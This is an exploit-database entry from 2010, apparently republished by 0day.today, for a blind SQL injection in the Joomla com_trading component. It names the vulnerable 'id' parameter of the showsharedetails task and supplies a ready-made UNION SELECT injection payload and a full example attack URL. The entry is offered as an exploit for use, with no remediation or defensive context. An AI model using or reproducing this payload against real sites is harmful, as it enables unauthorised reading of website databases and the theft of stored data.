Joomla Component com_trading Blind SQL Injection Vulnerability

2010-04-01T00:00:00
ID 1337DAY-ID-11553
Type zdt
Reporter DevilZ TM
Modified 2010-04-01T00:00:00

Description

Exploit for php platform in category web applications

                                        
                                            ==============================================================
Joomla Component com_trading Blind SQL Injection Vulnerability
==============================================================

# Title : Joomla Component com_trading Blind SQL Injection Vulnerability
# Author: DevilZ TM
# Data  : 2010-04-01
 
[~]######################################### InformatioN #############################################[~]
  
[~] Title     : Joomla Component com_trading Blind SQL Injection Vulnerability
[~] Author    : DevilZ TM By D3v1l
[~] Homepage  : http://www.DEVILZTM.com
[~] Email     : [email protected]
[~] Contact   : [email protected]
  
[~]#########################################   ExploiT   #############################################[~]
  
[~] Vulnerable File :
  
http://127.0.0.1/index.php?option=com_trading&task=showsharedetails&id=[Blind SQL]
  
[~] ExploiT         :
  
1+AND+1=0+UNION+SELECT+1,2,3,4,5,6,7,8,9,10--
  
[~] Example         :
  
http://127.0.0.1/index.php?option=com_trading&task=showsharedetails&id=1+AND+1=0+UNION+SELECT+1,2,3,4,5,6,7,8,9,10--



#  0day.today [2018-03-09]  #